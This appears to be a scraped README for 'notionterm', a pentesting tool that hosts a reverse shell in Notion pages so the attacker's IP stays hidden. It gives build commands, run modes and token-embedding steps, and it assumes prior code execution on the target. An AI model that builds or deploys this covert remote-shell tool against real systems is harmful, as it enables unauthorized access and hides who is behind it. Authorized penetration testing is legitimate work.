.png)
2 years ago
166 
Embed reverse shell in Notion pages.
Hack while taking notes
FOR:
Hiding attacker IP in reverse shell (No direct interaction between attacker and target machine. Notion is used as a proxy hosting the reverse shell) Demo/Quick proof insertion within report High available and shareable reverse shell (desktop, browser, mobile) Encrypted and authenticated remote shellNOT FOR:
Long and interactive shell session (see tacos for that)Why?
The focus was on making something fun while still being usable, but that's not meant to be THE solution for reverse shell in the pentester's arsenal
How?
Just use notion as usual and launch notionterm on target.
Requirements
Notion software and API key Allowed HTTP communication from the target to the notion domain Prior RCE on targetQuickstart
Set-up
Create a page and give to the integration API key the permissions to have page write access Build notionterm and transfer it on target machine (see install)Run
There are 3 main ways to run notionterm:
"normal" modeGet terminal, stop/unstop it, etc... notionterm [flags]
Start the shell with the button widget: turn ON, do you reverse shell stuff, turn OFF to pause, turn ON to resume etc... "server" mode
Ease notionterm embedding in any page notionterm --server [flags]
Start a shell session in any page by creating an embed block with URL containing the page id (CTRL+Lto get it): https://[TARGET_URL]/notionterm?url=[NOTION_PAGE_ID]. light mode
Only perform HTTP traffic from target → notion notionterm light [flags]
Install
As notionterm is aimed to be run on target machine it must be built to fit with it.
Thus set env var to fit with the target requirement:
Simple build
GOOS=$GOOS go build notionterm.go
You will need to set API key and notion page URL using either env var (NOTION_TOKEN & NOTION_PAGE_URL) or flags (--token & --page-url)
"All-inclusive" build
Embed directly the notion integration API token and notion page url in the binary.
everybody with access to the binary can retrieved the token. For security reason don't share it and remove it after use.
Set according env var:
export NOTION_TOKEN=[INTEGRATION_NOTION_TOKEN]
And build it:
./static-build.sh $NOTION_PAGE_URL $NOTION_TOKEN $GOOS go build notionterm.go
Bengali (Bangladesh) · 
English (United States) ·